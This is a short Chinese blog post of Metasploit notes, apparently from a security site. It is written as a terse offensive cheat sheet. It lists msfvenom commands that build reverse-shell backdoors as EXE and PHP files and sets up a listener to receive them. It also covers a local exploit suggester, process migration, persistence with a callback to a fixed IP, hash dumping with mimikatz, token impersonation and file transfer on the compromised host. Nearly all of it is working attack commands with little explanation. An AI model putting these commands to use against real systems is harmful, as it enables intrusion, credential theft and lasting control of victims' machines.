1. 首页
  2. 技术

Metasploit笔记

Metasploit笔记

生成exe后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o 1987.exe

生成PHP后门

msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f raw > php.php

使用监听模块(默认)

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

搜寻存在漏洞模块

post/multi/recon/local_exploit_suggester

迁移进程

migrate pid

权限维持 -Persistence

run persistence -U -i 10 -p 4444 -r 192.168.61.3

抓取Hash

run hashdump

load mimikatz

令牌伪装

list_tokens-u

如果查看失败先用

use incognito 或者 load incognito

进入该模块 再使用

impersonate_token 用户名

基本操作命令

ls:列出当前路径下的所有文件和文件夹。

pwd 或 getwd:查看当前路径。

search:搜索文件,使用 search -h 查看帮助。

cat:查看文件内容,比如 cat test.txt

edit:编辑或者创建文件。和Linux系统的vm命令类似,同样适用于目标系统是windows的情况。

rm:删除文件。

cd:切换路径。

mkdir:创建文件夹。

rmdir:删除文件夹。

getlwd 或 lpwd:查看自己系统的当前路径。

lcd:切换自己当前系统的目录。

lls:显示自己当前系统的所有文件和文件夹。

upload: upload 本地文件路径目标文件路径.

download: download 目标文件路径 本地文件路径

本文来自投稿,不代表祈安立场,如若转载,请注明出处:http://www.qisafe.net/?p=232

发表评论

电子邮件地址不会被公开。 必填项已用*标注